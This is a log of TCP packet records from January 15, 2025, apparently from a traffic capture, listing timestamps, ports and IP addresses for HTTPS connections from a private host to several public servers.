                                                            Jan 15, 2025 17:02:06.425436974 CET44349726104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.425507069 CET49726443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:06.465364933 CET44349726104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.465452909 CET49726443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:06.507710934 CET44349726104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.507786036 CET44349726104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.507788897 CET49726443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:06.507818937 CET44349726104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.507841110 CET49726443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:06.507921934 CET44349726104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.507976055 CET49726443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:06.508076906 CET49726443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:06.508094072 CET44349726104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.510709047 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:06.510813951 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.511017084 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:06.511240959 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:06.511276960 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.525113106 CET49730443192.168.2.16188.114.96.3
                                                            Jan 15, 2025 17:02:06.525161028 CET44349730188.114.96.3192.168.2.16
                                                            Jan 15, 2025 17:02:06.525244951 CET49730443192.168.2.16188.114.96.3
                                                            Jan 15, 2025 17:02:06.525444984 CET49730443192.168.2.16188.114.96.3
                                                            Jan 15, 2025 17:02:06.525460958 CET44349730188.114.96.3192.168.2.16
                                                            Jan 15, 2025 17:02:06.654100895 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:06.654169083 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.654257059 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:06.654483080 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:06.654496908 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.796788931 CET44349728104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.797099113 CET49728443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:06.797127962 CET44349728104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.798235893 CET44349728104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.798561096 CET49728443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:06.798711061 CET49728443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:06.798851013 CET44349728104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.853802919 CET49728443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:06.935308933 CET44349728104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.935583115 CET44349728104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.935661077 CET49728443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:06.936125994 CET49728443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:06.936163902 CET44349728104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.962816954 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.963143110 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:06.963177919 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.963676929 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.964102030 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:06.964180946 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:06.964317083 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.007338047 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.021768093 CET44349730188.114.96.3192.168.2.16
                                                            Jan 15, 2025 17:02:07.022075891 CET49730443192.168.2.16188.114.96.3
                                                            Jan 15, 2025 17:02:07.022095919 CET44349730188.114.96.3192.168.2.16
                                                            Jan 15, 2025 17:02:07.022758961 CET44349730188.114.96.3192.168.2.16
                                                            Jan 15, 2025 17:02:07.023199081 CET49730443192.168.2.16188.114.96.3
                                                            Jan 15, 2025 17:02:07.023289919 CET44349730188.114.96.3192.168.2.16
                                                            Jan 15, 2025 17:02:07.023355007 CET49730443192.168.2.16188.114.96.3
                                                            Jan 15, 2025 17:02:07.067334890 CET44349730188.114.96.3192.168.2.16
                                                            Jan 15, 2025 17:02:07.112958908 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.113015890 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.113053083 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.113092899 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.113126993 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.113177061 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.113188982 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.113236904 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.113279104 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.113305092 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.113317966 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.113367081 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.113569975 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.115052938 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.117742062 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.117775917 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.117804050 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.117829084 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.117846966 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.117877960 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.119162083 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.119182110 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.119508028 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.127638102 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.127748013 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.128693104 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.128745079 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.128767014 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.170866966 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.221030951 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.221108913 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.221142054 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.221174002 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.221179962 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.221231937 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.221259117 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.221432924 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.221467018 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.221482038 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.221494913 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.221533060 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.221585989 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.221597910 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.221746922 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.222225904 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.222307920 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.222342014 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.222356081 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.222367048 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.222424030 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.222434044 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.223181009 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.223211050 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.223227978 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.223237991 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.223284960 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.223329067 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.223334074 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.223345995 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.223383904 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.223537922 CET44349730188.114.96.3192.168.2.16
                                                            Jan 15, 2025 17:02:07.223722935 CET44349730188.114.96.3192.168.2.16
                                                            Jan 15, 2025 17:02:07.223860979 CET49730443192.168.2.16188.114.96.3
                                                            Jan 15, 2025 17:02:07.224100113 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.224143982 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.224155903 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.225231886 CET49730443192.168.2.16188.114.96.3
                                                            Jan 15, 2025 17:02:07.225250006 CET44349730188.114.96.3192.168.2.16
                                                            Jan 15, 2025 17:02:07.232402086 CET49732443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:07.232439041 CET4434973235.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:07.232511997 CET49732443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:07.232712030 CET49732443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:07.232741117 CET4434973235.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:07.265780926 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.265814066 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.313801050 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.328175068 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.328267097 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.328336000 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.328355074 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.328372002 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.328385115 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.328413010 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.328795910 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.328854084 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.328870058 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.328932047 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.329215050 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.329266071 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.329274893 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.329312086 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.329345942 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.329351902 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.329917908 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.330018997 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.330043077 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.330051899 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.330064058 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.330071926 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.330108881 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.330116034 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.330355883 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.330925941 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.330965042 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.330986023 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.330992937 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.331013918 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.331027031 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.336863995 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.336908102 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.336936951 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.336962938 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.336976051 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.336997032 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.337028980 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.337038040 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.337059021 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.337071896 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.337078094 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.337126970 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.337346077 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.341562986 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.341588020 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.341618061 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.341624022 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.341655970 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.415138006 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.415208101 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.415251970 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.415250063 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.415288925 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.415306091 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.415306091 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.415329933 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.415380955 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.415412903 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.415424109 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.415436983 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.415440083 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.415498018 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.415501118 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.415513992 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.415541887 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.415597916 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.415642977 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.415724039 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.415740967 CET44349729104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.415791988 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.415812016 CET49729443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.425070047 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.425199032 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.425235987 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.425254107 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.425290108 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.425349951 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.425569057 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.425640106 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.425848961 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.425858021 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.425982952 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.426017046 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.426034927 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.426043987 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.426074982 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.426098108 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.426117897 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.426129103 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.426142931 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.427002907 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.427037001 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.427052021 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.427058935 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.427082062 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.427110910 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.427123070 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.427130938 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.427165031 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.427166939 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.427176952 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.427223921 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.469325066 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.469413042 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.469451904 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.513241053 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.513541937 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.513719082 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.513775110 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.513789892 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.513884068 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.513931990 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.513940096 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.514134884 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.514179945 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.514187098 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.514236927 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.514283895 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.514292002 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.514333963 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.514336109 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.514365911 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.514377117 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.514919996 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.514992952 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.514998913 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.515023947 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.515075922 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.515083075 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.515180111 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.515594006 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.515645981 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.515773058 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.515834093 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.515865088 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.515913963 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.516649008 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.516719103 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.516757965 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.516808033 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.516855955 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.516905069 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.516963959 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.517021894 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.558039904 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.558115005 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.601944923 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.602054119 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.602071047 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.602098942 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.602129936 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.602159977 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.602309942 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.602376938 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.602647066 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.602745056 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.602787971 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.602822065 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.602859020 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.602874994 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.602905989 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.602919102 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.603328943 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.603431940 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.603491068 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.603524923 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.603588104 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.603611946 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.603666067 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.604410887 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.604481936 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.604506969 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.604572058 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.604604959 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.604659081 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.604671955 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.604723930 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.604753971 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.604762077 CET44349731104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.605036974 CET49731443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:07.607268095 CET49734443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.607310057 CET44349734104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.607409954 CET49734443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.607604980 CET49734443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:07.607609987 CET44349734104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:07.725626945 CET4434973235.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:07.725867987 CET49732443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:07.725897074 CET4434973235.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:07.726803064 CET4434973235.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:07.726880074 CET49732443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:07.727961063 CET49732443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:07.728034019 CET49732443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:07.728037119 CET4434973235.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:07.775330067 CET4434973235.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:07.776778936 CET49732443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:07.776789904 CET4434973235.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:07.824826002 CET49732443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:07.856093884 CET4434973235.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:07.856287003 CET4434973235.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:07.856386900 CET49732443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:07.856440067 CET49732443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:07.856440067 CET49732443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:07.856465101 CET4434973235.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:07.856512070 CET49732443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:07.857137918 CET49735443192.168.2.1635.190.80.1
